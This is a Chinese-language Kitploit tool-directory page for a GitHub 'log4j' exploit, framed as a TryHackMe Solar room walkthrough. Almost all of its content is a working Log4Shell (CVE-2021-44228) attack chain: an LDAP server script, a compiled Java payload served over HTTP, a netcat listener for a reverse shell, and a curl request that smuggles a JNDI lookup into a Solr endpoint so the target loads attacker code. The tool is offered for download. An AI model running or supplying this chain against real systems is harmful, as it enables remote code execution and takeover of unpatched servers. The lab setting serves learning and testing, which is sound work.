Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
log4j | Kitploit
工具/GitHubGitHub/h3x0v3rl0rd/log4j
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育
GitHubh3x0v3rl0rd/log4j

log4j

查看仓库
1年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

💻 -h3x0v3rl0rd-

利用 log4j CVE-2021-44228(TryHackMe Solar 演练)

root@kitploit:~
git clone https://github.com/n3rdh4x0r/log4j.git 

1. 运行 log4j.py(这将安装所有必要的应用程序并启动 LDAP 服务器)

root@kitploit:~
ifconfig tun0
python3 log4j.py 10.8.227.251

image

2. 将攻击者 IP 添加到 Exploit.java 文件中

2021-12-19_00-52

3. 编译 payload

root@kitploit:~
javac Exploit.java -source 8 -target 8

image

4. 临时 HTTP 服务器

root@kitploit:~
python3 -m http.server 8888

image

5. netcat 监听器

root@kitploit:~
nc -lnvp 9999

image

6. 最后,剩下要做的就是触发漏洞并发送我们的 JNDI 语法!请注意端口号的变化(现在指向我们的 LDAP 服务器)以及我们检索的资源,并指定我们的 exploit:

root@kitploit:~
curl 'http://10.10.45.175:8983/solr/admin/cores?foo=$\{jndi:ldap://10.8.227.251:1389/Exploit\}'

image

image

下载工具